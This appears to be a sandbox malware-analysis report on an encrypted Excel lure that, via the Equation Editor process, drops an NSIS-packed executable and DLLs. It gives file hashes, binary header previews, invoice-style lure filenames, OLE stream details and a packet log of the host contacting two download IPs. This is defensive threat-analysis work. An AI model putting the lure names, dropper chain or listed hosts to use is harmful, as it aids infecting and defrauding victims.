                                                                                                                                                                                                        SHA-512:03889A1FA29D924FD5EB1C293A8D62FAF78876EC5CCF90F7602DC92302DB1D06BC162BDE097A66E9D148C90D0B7920E539CED3D0EF3A9AB4DD230AA73DE7EC7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: ........,...................$...............................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: lpdKSOB78u.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: jTmBvrBw7V.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: 523JHfbGM1.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: TAk8jeG5ob.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: PAYMENT COPY.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Orderoffer.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: INV_PR2201.docm, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Purchase Order___pdf ____________.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: quote.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Order83930.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: GPP.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: OrderSuppliesQuote0817916.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: ACCOUNT DETAILS.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tjqth.zz
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):164352
                                                                                                                                                                                                        Entropy (8bit):7.998867839876064
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:ajw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAW2:agstrYBJ9Dy3SFSxuPmWo
                                                                                                                                                                                                        MD5:D0AA54167E81FD8C6C7CBC832E178855
                                                                                                                                                                                                        SHA1:7DEB6EB916CCDB8BDF62214F2F3026E9758CBCF6
                                                                                                                                                                                                        SHA-256:C8FD43535A87747A5046D1096717E18CE1E67D1B428498C072F011F3FA9A21E0
                                                                                                                                                                                                        SHA-512:380D39FA1D20BA78F13F91B3B5EA16B058BC864019C8608898941B723E9B04DFEAADDFAF041DC0D888388E056CA188978AEB3797A2C243313772AD83EB7FCFB7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: .......Z...~....m...r...~.k.O...Sq....T.E..X.zT..y.*r.{.....s2=...t7^...a.?Gb.4k.).l4e.d.........X.?AO..*.[....].}....0..........j~v...Q.D!A.wA......W.C..@{y...s.#z}.......\x..#4..i.=)dO......#^$..s.._..G{.....8s(...q[..>.D.\U..W....{....6s.?i.:?.{.f.(.|......]..3...^(tS...+..o.N..Kn].,.. %.`.....M^.CRlj3.{.[..i.\-.....l.....+.:YD.....v.c.~[.....~...z.F._a.i/.g\.uF.l..G.D=......:...;...+.F..C...33.R3.[j=...%..G.a{P....KWu....L{...Zr.....6IE<..E&....H..j..;R......K...^}.....CO..v...'ov!..f$j....A...Uh.y.......8'...$.....'aSS.k57.(..}I...U......wL. ...-;....A..qXZ....)*8x.V...1...s....PM.(&j.w..a.R..Rx..<;e2.... ......K..V..c5.lD.eT.n../b..7P..S..I....K~.....K....I..._.p...,:.H.1...4.4.!...6.......?.x...N.*.;.....8..;.Op.u..]...\..B..4J....`.t".BEm.`\..2....;..C.).uV7...m...c...x9W.m#..T....@A2M..(..$S......l$b.8..........4'#..OM.%...\..F.d...|..v.`../x.......#.3.l....1XB.[s..>..g.bz....c.Ax.I.q;O..'. P.n.y..0...c...w9..'\....".s.....1
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\z9ayiyo.dll
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                        Entropy (8bit):6.6898431043201
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:NEBgIVyWyVDSLUpyceXGkLF6HSFLdtyfJHxPVAcnuvmMeT8XfWJ1QhulooeUZi+w:qBnADSLwgXG7yFDixPVmxP4QPCrvLs3
                                                                                                                                                                                                        MD5:94A51F0839DE3A6F5069F766E7BDE4A7
                                                                                                                                                                                                        SHA1:19454F40631ACE4B3DE692C245E3F2551A6794D6
                                                                                                                                                                                                        SHA-256:2D78C0015CEC67CD072ACFB337075825D4A6866D5FAC1B497A649DEB2190F42C
                                                                                                                                                                                                        SHA-512:07468053EFD63FC4B404D87722E0E282B1C5C487CF97E6D858771B67B2574C90D62341FD96D3CFB94ACA6ED357E40657842ADD01E7C563AE170A65450A4EB75A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.N.e.N.e.N.e.N.e.NI..N.e.N..cN.e.N..gN.e.N..dN.e.N..aN.e.NRich.e.N................PE..L...F.4`...........!.........&............... ...............................p............@.........................P$..I.... .......P.......................`..d.................................................... ...............................code............................... ....rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):330
                                                                                                                                                                                                        Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                        C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):217624
                                                                                                                                                                                                        Entropy (8bit):7.895818449493941
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
                                                                                                                                                                                                        MD5:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        SHA1:32FDCC2E0BCFC476347078D7EA05F12D5A259BEA
                                                                                                                                                                                                        SHA-256:38B6A40D2EEDDF38695294C57971FC2EFAB81FEA95100260A2003BAA13616B83
                                                                                                                                                                                                        SHA-512:B8312043058B28C0EEDE079425D785B581AABEAE63C889DDC4382FAA2B070333FC8A6E76F7810678CB9AE96B9E52D6E48604CEF9417C565C97C0FAADFE36B953
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@.......................................@.................................D...........|............................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...XU...........~..............@....ndata...................................rsrc...|...........................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:CDFV2 Encrypted
                                                                                                                                                                                                        Entropy (8bit):7.99670962439914
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                                        File name:QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                                                        File size:2421248
                                                                                                                                                                                                        MD5:1b862193e621b4d67be94a2ec44fbf50
                                                                                                                                                                                                        SHA1:0bab9195da974524c969404430f6a58b31303322
                                                                                                                                                                                                        SHA256:709ae19031f48115d89fb3aeae68476aac8b17a1e97700c6beff820b7c54b8aa
                                                                                                                                                                                                        SHA512:ba8833f1b0865cfe8c86b4eaa38c2b714152483703df8be21b7ecbe889480a0498c6d875bbcb28ba24c2898b13aa439849dddbf95cb8dc5dcdca75e3e69ca540
                                                                                                                                                                                                        SSDEEP:49152:YlbvU6wGnyG31TrBVcx6+mpF14GIlyXPs5OzOy7i0llTl8Z4JeZWo:YZvpwGnyGlTrBVcxMpF1TIyPsEzON0lm
                                                                                                                                                                                                        File Content Preview:........................>...................%...........................................................................................~...............z.......|.......~...............z.......|.......~...............z......................................

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                                                        Static OLE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Document Type:OLE
                                                                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                                                                        OLE File "QTN3C2AF414EDF9_041873.xlsx"

                                                                                                                                                                                                        Indicators

                                                                                                                                                                                                        Has Summary Info:False
                                                                                                                                                                                                        Application Name:unknown
                                                                                                                                                                                                        Encrypted Document:True
                                                                                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                                                                        Flash Objects Count:
                                                                                                                                                                                                        Contains VBA Macros:False

                                                                                                                                                                                                        Streams

                                                                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:64
                                                                                                                                                                                                        Entropy:2.73637206947
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:112
                                                                                                                                                                                                        Entropy:2.7597816111
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:200
                                                                                                                                                                                                        Entropy:3.13335930328
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                        Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                                                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:\x6DataSpaces/Version
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:76
                                                                                                                                                                                                        Entropy:2.79079600998
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                                                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 2398680
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:EncryptedPackage
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:2398680
                                                                                                                                                                                                        Entropy:7.99993012299
                                                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                                                        Data ASCII:. . $ . . . . . . 2 . . q ( . . . . 1 . f . x . ^ . . . . . . . . & . . . . . . . + . . . . . ) . . . 5 J . . . . . . . . . . 4 J . . . . c . ~ . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . .
                                                                                                                                                                                                        Data Raw:c8 99 24 00 00 00 00 00 8a 32 ec b2 71 28 0f 8d d9 d5 31 f1 66 00 78 fa 5e aa c9 c2 a1 c6 bc ea b4 26 09 be e7 d8 9b ba 9f 2b c6 f7 fb 14 f0 29 a0 93 1b 35 4a af 02 e9 cb e9 8e d5 0c 09 d5 34 4a 0a 17 1e a7 63 df 7e 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5
                                                                                                                                                                                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:EncryptionInfo
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:224
                                                                                                                                                                                                        Entropy:4.51185762188
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . h - K . . . > % . B ] . . , . 4 . . . | . . . . . X . . . . . . . . . @ . . . $ . " * . f . . l . . . / . . k . . . . P . . . . F .
                                                                                                                                                                                                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.425698042 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.626029015 CET804916754.67.57.56192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.626152992 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.626580000 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.840116024 CET804916754.67.57.56192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.840220928 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.840297937 CET4916780192.168.2.2254.67.57.56
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.944238901 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.041582108 CET804916754.67.57.56192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.166332960 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.166465998 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.166852951 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389307976 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389350891 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389374971 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389398098 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389426947 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389426947 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389431000 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389470100 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611238003 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611298084 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611337900 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611371994 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611407042 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611428976 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611449957 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611459017 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611479044 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611486912 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611500978 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611520052 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611522913 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611563921 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833647966 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833687067 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833712101 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833735943 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833759069 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833782911 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833808899 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833825111 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833832026 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833853960 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833858013 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833874941 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833893061 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833911896 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833930016 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833947897 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833970070 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833992958 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.833997965 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.834016085 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.834041119 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.837861061 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.056813002 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.056850910 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.056917906 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057039022 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057063103 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057084084 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057085991 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057111979 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057133913 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057145119 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057148933 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057157040 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057158947 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057182074 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057190895 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057195902 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057208061 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057233095 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057250977 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057255983 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057256937 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057271004 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057282925 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057292938 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.057308912 CET8049168103.140.251.164192.168.2.22
